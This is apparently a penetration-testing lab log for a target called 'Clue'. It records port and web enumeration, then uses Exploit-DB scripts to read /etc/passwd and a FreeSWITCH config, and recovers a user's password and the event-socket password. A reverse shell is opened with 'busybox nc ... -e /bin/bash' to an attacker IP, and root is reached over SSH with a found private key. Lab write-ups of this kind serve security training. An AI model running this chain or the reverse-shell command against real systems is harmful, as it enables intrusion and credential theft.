Clue

๐Ÿงช Pentest Log: {{date:2025-08-03}}

๐Ÿ” Target Information

ip=192.168.215.240

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

Port 139,445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 3000

Cassandra Web

Google for "cassandra web exploit", found

Cassandra Web 0.5.0 - Remote File Read

Port 8021

FreeSwitch

Google for "freeswitch exploit", found

FreeSWITCH 1.10.1 - Command Execution

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://www.exploit-db.com/exploits/49362

python3 49362.py $ip /etc/passwd

python3 49362.py $ip /proc/self/cmdline

python3 49362.py $ip /etc/freeswitch/autoload_configs/event_socket.conf.xml

found cassie's password and freeswitch current password

cassie:SecondBiteTheApple330
<param name="password" value="StrongClueConEight021"/>

https://www.exploit-db.com/exploits/47799

get a shell using the exploit

python3 47799.py $ip "busybox nc 192.168.45.163 8021 -e /bin/bash"

nc -lvnp 8021

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

SSH:

ls /home/cassie

found

id_rsa

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

ssh -i id_rsa root@$ip